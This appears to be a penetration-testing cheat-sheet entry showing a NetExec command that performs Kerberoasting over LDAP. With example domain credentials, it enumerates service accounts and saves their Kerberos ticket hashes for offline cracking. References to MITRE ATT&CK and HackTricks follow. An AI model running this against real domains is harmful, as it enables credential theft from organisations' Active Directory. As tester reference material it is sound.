.. / NetExec-LDAP-Kerberoasting
Star

NetExec (formerly CrackMapExec) performs a Kerberoasting attack via the LDAP service. This command authenticates with the given domain account, enumerates Service Principal Name (SPN) accounts, and extracts their Kerberos ticket hashes, saving them into the specified file. The obtained hashes can later be cracked offline using brute force or wordlists.

Command Reference:

Target IP: 10.10.10.1
Domain: test.local
Username: john
Password: password123
Output File: output.txt

Command:

nxc ldap 10.10.10.1 -u 'john' -p 'password123' --kerberoasting output.txt

References:

https://github.com/Pennyw0rth/NetExec

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast

https://attack.mitre.org/techniques/T1558/003/

.. / NetExec-LDAP-Kerberoasting Star if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

.. / NetExec-LDAP-Kerberoasting
Star